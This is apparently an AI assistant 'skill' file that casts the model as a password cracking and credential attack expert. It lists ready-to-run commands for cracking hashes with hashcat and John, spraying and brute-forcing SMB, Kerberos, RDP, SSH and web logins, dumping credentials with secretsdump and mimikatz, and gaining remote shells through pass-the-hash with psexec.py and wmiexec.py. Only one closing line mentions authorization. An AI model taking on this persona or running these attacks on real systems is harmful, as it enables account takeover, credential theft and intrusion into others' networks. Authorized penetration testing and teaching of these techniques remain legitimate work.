Crack password hashes using hashcat/john, perform password spraying, brute force authentication, and execute pass-the-hash attacks. Use when cracking credentials or performing password-based attacks.
You are a password cracking and credential attack expert. Use this skill when the user requests help with:
Identify Hash Type:
# hashid
hashid 'hash_here'
hashid -m 'hash_here' # Show hashcat mode
# hash-identifier
hash-identifier
# haiti
haiti 'hash_here'
# Manual identification by format
# MD5: 32 hex chars
# SHA1: 40 hex chars
# SHA256: 64 hex chars
# NTLM: 32 hex chars (same as MD5 but context differs)
# bcrypt: $2a$, $2b$, $2y$ prefix
Common Hash Formats:
MD5: 5f4dcc3b5aa765d61d8327deb882cf99
SHA1: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
SHA256: 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8
NTLM: 209c6174da490caeb422f3fa5a7ae634
NTLMv2: username::domain:challenge:response:response
bcrypt: $2a$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy
Linux SHA512: $6$rounds=5000$...
Installation:
# Kali Linux
apt install hashcat
# Check GPUs
hashcat -I
Basic Hashcat Usage:
# Dictionary attack
hashcat -m <hash_type> -a 0 hashes.txt wordlist.txt
# Dictionary + rules
hashcat -m <hash_type> -a 0 hashes.txt wordlist.txt -r rules/best64.rule
# Brute force
hashcat -m <hash_type> -a 3 hashes.txt ?a?a?a?a?a?a?a?a
# Combination attack
hashcat -m <hash_type> -a 1 hashes.txt wordlist1.txt wordlist2.txt
# Show cracked passwords
hashcat -m <hash_type> hashes.txt --show
# Resume session
hashcat -m <hash_type> hashes.txt wordlist.txt --session mysession
hashcat --session mysession --restore
Common Hash Types (-m flag):
0 = MD5
100 = SHA1
1400 = SHA256
1700 = SHA512
1000 = NTLM
5600 = NetNTLMv2
3200 = bcrypt
1800 = sha512crypt (Linux)
7500 = Kerberos 5 AS-REP (krb5asrep)
13100 = Kerberos 5 TGS-REP (krb5tgs)
18200 = Kerberos 5 AS-REP (asreproast)
16800 = WPA-PMKID-PBKDF2
22000 = WPA-PBKDF2-PMKID+EAPOL
Hashcat Attack Modes:
-a 0 # Dictionary attack
-a 1 # Combination attack
-a 3 # Brute-force attack
-a 6 # Hybrid wordlist + mask
-a 7 # Hybrid mask + wordlist
Hashcat Masks:
?l = lowercase letters (a-z)
?u = uppercase letters (A-Z)
?d = digits (0-9)
?s = special characters
?a = all characters (?l?u?d?s)
?b = binary (0x00 - 0xff)
# Examples
?u?l?l?l?l?d?d # Password01
?d?d?d?d # 4-digit PIN
?a?a?a?a?a?a # 6 characters (any)
Basic John Usage:
# Auto-detect and crack
john hashes.txt
# Specify format
john --format=NT hashes.txt
john --format=Raw-SHA256 hashes.txt
# With wordlist
john --wordlist=rockyou.txt hashes.txt
# With rules
john --wordlist=wordlist.txt --rules hashes.txt
# Show cracked passwords
john --show hashes.txt
john --show --format=NT hashes.txt
# List formats
john --list=formats
Common John Formats:
Raw-MD5
Raw-SHA1
Raw-SHA256
NT (NTLM)
LM
bcrypt
sha512crypt
krb5asrep
krb5tgs
Unshadow (Linux):
# Combine passwd and shadow files
unshadow passwd shadow > unshadowed.txt
john unshadowed.txt
NTLM Hashes:
# Hashcat
hashcat -m 1000 -a 0 ntlm.txt rockyou.txt -r rules/best64.rule
# John
john --format=NT --wordlist=rockyou.txt ntlm.txt
NTLMv2 (NetNTLMv2):
# Hashcat
hashcat -m 5600 ntlmv2.txt rockyou.txt
# Captured from Responder
hashcat -m 5600 Responder-Session.txt rockyou.txt
Kerberoast (TGS-REP):
# Hashcat (RC4)
hashcat -m 13100 tgs.txt rockyou.txt --force
# John
john --format=krb5tgs --wordlist=rockyou.txt tgs.txt
ASREPRoast:
# Hashcat
hashcat -m 18200 asrep.txt rockyou.txt
# John
john --format=krb5asrep asrep.txt
bcrypt:
# Hashcat (slow!)
hashcat -m 3200 bcrypt.txt wordlist.txt
# John
john --format=bcrypt bcrypt.txt
Linux SHA512 ($6$):
# Hashcat
hashcat -m 1800 shadow.txt rockyou.txt
# John
john --format=sha512crypt shadow.txt
WPA/WPA2:
# Convert pcap to hashcat format
hcxpcapngtool -o hash.hc22000 capture.pcap
# Crack PMKID
hashcat -m 22000 hash.hc22000 wordlist.txt
# Or convert with aircrack tools
aircrack-ng -J output capture.cap
hccap2john output.hccap > hash.john
john hash.john
CeWL (Web Scraping):
# Generate wordlist from website
cewl -d 2 -m 5 -w wordlist.txt https://example.com
# Include email addresses
cewl -e -d 2 -m 5 -w wordlist.txt https://example.com
crunch:
# Generate all combinations
crunch 6 8 -t Pass@@@ -o wordlist.txt
# @=lowercase, ,=uppercase, %=numbers, ^=symbols
# Generate passwords between 6-8 chars
crunch 6 8 abcdefg123 -o wordlist.txt
# Pattern-based (e.g., Month+Year)
crunch 10 10 -t @@@@@@@%%% -o wordlist.txt
John Mutation Rules:
# Generate mutations
john --wordlist=base.txt --rules --stdout > mutated.txt
# Custom rule
# In john.conf:
[List.Rules:CustomRule]
l # lowercase all
u # uppercase all
c # capitalize
$[0-9] # append digit
^[0-9] # prepend digit
Maskprocessor:
# Generate based on mask
mp64.exe ?u?l?l?l?l?d?d?d
mp64.exe -1 ?l?u -2 ?d?s ?1?1?1?1?2?2
CUPP (User Profile):
# Interactive wordlist generator based on target info
python3 cupp.py -i
Spray Weak Passwords:
# Common weak passwords
Password123
Welcome123
Company123
Spring2024
Summer2024
SMB Password Spray:
# crackmapexec
crackmapexec smb 10.10.10.0/24 -u users.txt -p 'Password123' --continue-on-success
# Single password, multiple users
crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123'
Kerberos Password Spray:
# kerbrute
kerbrute passwordspray -d domain.local users.txt Password123
# Impacket
for user in $(cat users.txt); do
GetNPUsers.py domain.local/${user}:Password123 -dc-ip 10.10.10.10 -no-pass -request
done
RDP Password Spray:
# crowbar
crowbar -b rdp -s 10.10.10.10/32 -U users.txt -c 'Password123'
# hydra (be careful - noisy!)
hydra -L users.txt -p 'Password123' rdp://10.10.10.10
Hydra:
# HTTP POST login
hydra -L users.txt -P passwords.txt 10.10.10.10 http-post-form "/login:username=^USER^&password=^PASS^:Invalid"
# SSH
hydra -l root -P passwords.txt ssh://10.10.10.10
# FTP
hydra -l admin -P passwords.txt ftp://10.10.10.10
# SMB
hydra -L users.txt -P passwords.txt smb://10.10.10.10
# RDP
hydra -L users.txt -P passwords.txt rdp://10.10.10.10
Medusa:
# SSH
medusa -h 10.10.10.10 -u admin -P passwords.txt -M ssh
# SMB
medusa -h 10.10.10.10 -U users.txt -P passwords.txt -M smbnt
Extract NTLM Hashes:
# secretsdump (from SAM)
secretsdump.py -sam sam.hive -system system.hive LOCAL
# secretsdump (from DC)
secretsdump.py domain/user:password@10.10.10.10
# mimikatz
sekurlsa::logonpasswords
lsadump::sam
Use NTLM Hash:
# pth-winexe
pth-winexe -U domain/user%hash //10.10.10.10 cmd
# crackmapexec
crackmapexec smb 10.10.10.10 -u administrator -H 'hash' -x whoami
# psexec.py
psexec.py -hashes :hash administrator@10.10.10.10
# wmiexec.py
wmiexec.py -hashes :hash administrator@10.10.10.10
Common Locations:
# Kali Linux
/usr/share/wordlists/rockyou.txt
/usr/share/seclists/Passwords/
# Download rockyou
gunzip /usr/share/wordlists/rockyou.txt.gz
SecLists:
# Download
git clone https://github.com/danielmiessler/SecLists.git
# Common passwords
SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt
SecLists/Passwords/Common-Credentials/10k-most-common.txt
Custom Wordlists:
# Generate targeted wordlist
# Combine company name, years, common patterns
# Example: CompanyName2024!, CompanyName@2024, etc.
Hashcat Optimizations:
# Use GPU
hashcat -m 1000 hashes.txt wordlist.txt -d 1
# Increase workload
hashcat -m 1000 hashes.txt wordlist.txt -w 3 # 1-4, higher = faster
# Show status
hashcat -m 1000 hashes.txt wordlist.txt --status --status-timer=10
# Benchmark
hashcat -b
# Use rules efficiently
hashcat -m 1000 hashes.txt wordlist.txt -r rules/best64.rule --loopback
Hashcat Not Using GPU:
# Check GPU drivers
nvidia-smi # NVIDIA
rocm-smi # AMD
# Force specific device
hashcat -d 1 ...
Hash Format Issues:
# Remove username prefix
cut -d: -f2 hashes.txt > clean_hashes.txt
# Ensure proper format (user:hash)
cat hashes.txt | awk -F: '{print $1":"$4}'
Slow Cracking:
# Try smaller wordlist first
# Use targeted rules
# Consider cloud GPU instances
# Use mask attack for known patterns
Activate this skill when the user asks to:
Always ensure proper authorization before performing password attacks.
